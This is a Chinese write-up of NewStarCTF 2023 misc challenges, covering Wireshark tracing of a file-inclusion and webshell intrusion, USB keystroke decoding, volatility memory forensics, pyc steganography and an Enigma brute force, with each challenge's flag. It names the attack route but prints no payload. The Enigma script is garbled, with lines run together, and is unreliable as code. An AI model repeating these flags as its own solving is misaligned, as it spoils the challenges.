NewStarCTF2023复盘WP

WEEK3|MISC

2-分析

但你心中仍然有一种不祥的预感,这时你的同事告诉你这台服务器已经被攻击者获取到了权限,需要你尽快去还原攻击者的攻击路径,调查清楚攻击者是如何获取到服务器权限的。

FLAG格式flag{md5(攻击者登录使用的用户名_存在漏洞的文件名_WebShell文件名)}

例如flag{testuser_123.php_shell.php},将括号内的内容进行md5编码得到flag{58aec571c731faae1369b461d3927596}即为需要提交的Flag

  • 考点:HTTP流量分析、简单溯源

  • FLAG:flag{4069afd7089f7363198d899385ad688b}

  • 解题步骤

flag由三个信息构成:登录用户名、存在漏洞的文件名、写入的WebShell文件名。

根据我们的常识,一般登录请求都是POST方式的请求,因此可以先过滤出所有的POST请求:

1
http && http.request.method == POST

可以看到有一个发送给/api/action/login.php的POST请求中有username和password字段:

image-20231108212816327

由此推断出登录的用户名为best_admin。

其次是存在漏洞的文件名和WebShell文件名,可以看到有大量的目录扫描流量,先使用WireShark过滤器过滤掉响应状态码为404的响应:

1
http && http.response.code != 404

对剩下的流量进行分析,关注到1267号流量响应比较奇怪

image-20231108213006677

由此可以得到剩下的两个信息,index.php文件的page参数存在任意文件包含漏洞,攻击者通过这个漏洞包含pearcmd.php向服务器中写入了名为wh1t3g0d.php的WebShell。

而后续的流量也可以看到攻击者是利用wh1t3g0d.php这个Shell执行了一些系统命令

image-20231108213340402

由此得到Flag明文:best_admin_index.php_wh1t3g0d.php

整体md5后包裹flag{}得到最终flag:flag{4069afd7089f7363198d899385ad688b}

键盘侠

如果我是键盘侠,你又该如何应对呢

  • 考点:USB键盘流量分析

  • FLAG:flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}

  • 解题步骤

打开题目发现是USB流量,结合题目名猜测是键盘流量,使用WireShark过滤器过滤出所有的键盘流量,然后导出保存为res.pcapng:

1
usb.src =="1.15.1"

使用tshark命令对流量数据进行提取并去除空行:

1
tshark -r res.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

导出后使用以下脚本进行按键信息提取:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
normalKeys = {
  "04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"

}

shiftKeys = {

  "04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"

}

nums = []
keys = open('usbdata.txt')
for line in keys:
	if len(line)!=17:
		continue
	nums.append(line[0:2]+line[4:6])
keys.close()
output = ""
for n in nums:
	if n[2:4] == "00" :
		continue
	if n[2:4] in normalKeys:
		if n[0:2]=="02":
			output += shiftKeys [n[2:4]]
		else :
			output += normalKeys [n[2:4]]
	else:
		output += '[unknown]'
print('output :n' + output)

得到如下结果:

1
nw3lc0m3<SPACE>to<SPACE>newstar<SPACE>ctf<SPACE>2023<SPACE>flag<SPACE>is<SPACE>here<SPACE>vvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888<ESC><ESC>2hhxgbffffbbbnnat<CAP><CAP>ff<DEL>lll<DEL><DEL>aaa<DEL><DEL>gggg<DEL><DEL><DEL>{999<DEL><DEL>999<DEL><DEL>11<DEL>9aaa<DEL><DEL><SPACE><SPACE><DEL><DEL>eb2---<DEL><DEL>a450---<DEL><DEL>2f5f<SPACE><SPACE><SPACE><DEL><DEL><DEL>--<DEL>7bfc[unknown][unknown][unknown]-8989<DEL><DEL>dfdf<DEL><DEL>4bfa4bfa<DEL><DEL><DEL><DEL>85848584}}}<DEL><DEL><DEL><DEL><DEL><DEL><DEL>}]<SPACE><SPACE><SPACE><SPACE>nice<SPACE>work!1yyoou<SPACE>ggot<SPACE>tthhis<SPACE>fllag

<DEL>表示删除,<SPACE>表示空格,根据这个按键顺序对数据进行处理后得到flag:

flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}

WEEK4|MISC

第一次取证

  • 考点:内存取证

  • FLAG:flag{a308067fc26625d31a421247adce3893}

  • 解题步骤

下载附件使用volatility获取信息:

1
volatility -f ./dycqz.raw imageinfo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Volatility Foundation Volatility Framework 2.6.1
INFO  : volatility.debug  : Determining profile based on KDBG search...
     Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
           AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
           AS Layer2 : FileAddressSpace (/Users/ye/Desktop/Web/dycqz.raw)
           PAE type : No PAE
              DTB : 0x187000L
             KDBG : 0xf8000403c070L
     Number of Processors : 4
   Image Type (Service Pack) : 0
        KPCR for CPU 0 : 0xfffff8000403dd00L
        KPCR for CPU 1 : 0xfffff880009ee000L
        KPCR for CPU 2 : 0xfffff88004568000L
        KPCR for CPU 3 : 0xfffff880045dd000L
       KUSER_SHARED_DATA : 0xfffff78000000000L
      Image date and time : 2023-10-06 13:32:23 UTC+0000
   Image local date and time : 2023-10-06 21:32:23 +0800

查看内存进程列表:

1
volatility -f ./dycqz.raw --profile=Win7SP1x64 pslist

image-20231108220405190

查看notepad进程:

1
volatility -f ./dycqz.raw --profile=Win7SP1x64 editbox

image-20231108220415340

得到一串密文:

1
@iH<,{BTrI;(N[`j&z+xcj9XE2!u/YbR:4gb2+ceDJs@u6P

base91解码: ★ flag{a308067fc26625d31a421247adce3893}

WEEK5|MISC

新建Python文件

  • 考点:pyc剑龙隐写

  • FLAG:flag{s0_b4By_pYcst3g}

  • 解题步骤

pyc文件隐写很容易就能找到stegosaurus项目:https://github.com/AngelKitty/stegosaurus

需要注意的是这个项目对于环境要求比较离谱,尽量用Python3.6去运行,起一个Docker就行。

直接提取隐写数据即可:

1
python3 stegosaurus/stegosaurus.py -x flag.pyc

image-20231108220801131

ezhard

第一次磁盘取证

  • 考点:磁盘取证

  • 解题步骤

拿到文件之后发现是硬盘格式文件

image-20231108234758191

新建目录 挂载

image-20231108234923416

image-20231108234942267

flag{12bc2ba3-fa54-7b45-7f3d-f54ea6e45d7c}

Enigma

不做Sigma CTFer,要做Enigma CTFer. FLAG内容由大写字母构成,需要自行包裹flag{}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from enigma.machine import EnigmaMachine
from secret import *

def enigma(m, _reflector, _rotors, _rs):
	machine = EnigmaMachine.from_key_sheet(
            rotors=_rotors,
            reflector=_reflector,
            ring_settings=_rs,
            plugboard_settings='')
	temp = machine.process_text(m)
	return temp.lower()

print(enigma(flag, reflector, rotors, [rs1,15,rs2]))
# uwdhwalkbuzwewhcaaepxnqsvfvkohskkspolrnswdfcbnn

其中我们未知的加密参数有reflector、rotors和rs1、rs2

大概了解一下这个类库就能知道这几个参数的取值范围,编写脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
from enigma.machine import EnigmaMachinere
flectors = ['B-Thin', 'C-Thin']rotors = ['I', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII']
for r1, r2, r3 in [(r1, r2, r3) for r1 in rotors for r2 in rotors for r3 in rotors]:    for r in reflectors:
	for a, b in [(a, b) for a in range(1, 26) for b in range(1, 26)]:            
		machine = EnigmaMachine.from_key_sheet(                rotors=' '.join([r1, r2, r3]),               
		reflector=r,                
		ring_settings=[a, 15,b],
        plugboard_settings=''           
        )            
        temp = machine.process_text('uwdhwalkbuzwewhcaaepxnqsvfvkohskkspolrnswdfcbnn')
        if temp.startswith("FLAG"):                
        	print(temp, r1, r2, r3, r)                
        	break

半分钟就能得到Flag:

1
FLAGISENIGMAISSOOOINTERESTINGCRYPTODOYOUTHINKSO II IV VII C-Thin

包裹flag{}得到Flag:flag{ENIGMAISSOOOINTERESTINGCRYPTODOYOUTHINKSO}

官方writeup

《NewStarCTF 2023 Week1 官方WriteUp》
https://shimo.im/docs/XKq421EBKzFyRzAN/

《NewStarCTF 2023 Week2 官方WriteUp》
https://shimo.im/docs/Dy5ekHJhKo0ap5v3/

《NewStarCTF 2023 Week3 官方WriteUp》
https://shimo.im/docs/QPMRxzGktzsZnzhz

《NewStarCTF 2023 Week4 官方WriteUp》
https://shimo.im/docs/gXqmdVvbOEsXpo3o/

《NewStarCTF 2023 Week5 官方WriteUp》
https://shimo.im/docs/R3sGgZdrlyE6nL8T/